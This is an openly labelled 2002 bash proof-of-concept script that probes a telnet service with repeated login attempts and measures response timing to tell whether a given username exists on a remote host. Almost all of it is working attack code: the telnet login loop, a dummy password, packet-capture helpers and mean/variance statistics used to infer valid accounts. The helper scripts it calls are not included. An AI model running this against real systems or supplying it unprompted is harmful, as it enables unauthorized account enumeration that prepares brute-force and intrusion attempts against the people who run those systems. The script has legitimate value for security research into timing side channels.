#!/bin/bash
# Probe a telnet service using remote timing techniques
# to determine if a user exist or not.
# Proof of Concept code. 
# (C) 2002 maurol (maurol@mail.com)

# Customize these if needed:
LOOPBACK=lo
LAN=eth0
#WAN=eth0
WAN=ppp0

# Default interface to listen to
#IFACE=$LAN
IFACE=$WAN

# Default port
PORT=23
# Default number of probes
COUNT=10
# Time in seconds to wait before sending the username. For slow links
# and/or no reverse dns resolution this could be as big as 25.
LAN_SLEEP=1
WAN_SLEEP=6
#SLEEP=$LAN_SLEEP
SLEEP=$WAN_SLEEP

if [ $# -lt 2 ]
then
	echo "Usage: $0 <ip> <user> [count] [sleep]"
	echo "ip   : IP address of remote system."
	echo "user : Username to probe."
	echo "count: Number of probes."
	echo "sleep: Initial sleep in seconds."
	exit 1
fi

HOST=$1
USER=$2

[ "$HOST" = "127.0.0.1" ] && IFACE=$LOOPBACK
if echo $HOST | grep -E "^10\.|^192\.168\." >/dev/null
then
	IFACE=$LAN
fi

[ "$IFACE" = "$LOOPBACK" ] && SLEEP=$LAN_SLEEP
[ "$IFACE" = "$LAN" ] && SLEEP=$LAN_SLEEP
[ "$IFACE" = "$WAN" ] && SLEEP=$WAN_SLEEP

PASS=zzzzz
export PASS

[ -z "$3" ] || COUNT=$3
[ -z "$4" ] || SLEEP=$4

export IFACE HOST PORT USER

MEAN=./mean
VAR=./var

[ -x $MEAN ] || cc -o mean mean.c
[ -x $VAR ]  || cc -o var -lm var.c

>tests.$USER
c=0
while [ $c -lt $COUNT ]
do
# Launch the capture script in the background
	(./capture.sh >/tmp/regs.$$ ; ./dif.sh /tmp/regs.$$ | tee -a tests.$USER; rm -f /tmp/regs.$$) &
# Start telnet session
	(sleep $SLEEP; echo $USER; sleep 1 ; echo $PASS ; sleep 3)| telnet $HOST
	c=`expr $c + 1`
	sleep 1
done
echo
(
cat tests.$USER | egrep -v "^[ 	]*$"
echo -n "mean:	" ; cat tests.$USER | egrep -v "^[ 	]*$" | $MEAN 2 ;echo
echo -n "var.:	" ; cat tests.$USER | egrep -v "^[ 	]*$" | ./var.sh 2 ;echo
) | tee stats.$USER ; rm -f tests.$USER
